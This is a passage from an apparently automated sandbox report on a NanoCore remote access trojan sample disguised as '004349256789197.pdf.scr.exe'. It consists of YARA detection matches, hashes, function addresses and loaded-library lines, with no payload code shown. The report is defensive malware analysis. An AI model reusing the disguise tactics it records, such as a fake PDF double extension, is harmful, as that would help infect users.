      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D848E0_2_003D848E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E6CDC0_2_003E6CDC
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E00B70_2_003E00B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E40880_2_003E4088
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D40FE0_2_003D40FE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E71530_2_003E7153
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F51C90_2_003F51C9
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D32F70_2_003D32F7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E62CA0_2_003E62CA
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E43BF0_2_003E43BF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DC4260_2_003DC426
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DF4610_2_003DF461
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FD4400_2_003FD440
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E77EF0_2_003E77EF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D286B0_2_003D286B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FD8EE0_2_003FD8EE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DE9B70_2_003DE9B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_004019F40_2_004019F4
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E3E0B0_2_003E3E0B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F4F9A0_2_003F4F9A
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DEFE20_2_003DEFE2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BBE0BE6_2_00BBE0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC80376_2_00BC8037
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC20076_2_00BC2007
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BAE1A06_2_00BAE1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDA28E6_2_00BDA28E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC22C26_2_00BC22C2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA225D6_2_00BA225D
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BBC59E6_2_00BBC59E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2C7A36_2_00C2C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDE89F6_2_00BDE89F
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1291A6_2_00C1291A
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD6AFB6_2_00BD6AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C08B276_2_00C08B27
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BCCE306_2_00BCCE30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C351D26_2_00C351D2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD71696_2_00BD7169
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA92406_2_00BA9240
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA94996_2_00BA9499
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: dxgidebug.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: 004349256789197.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
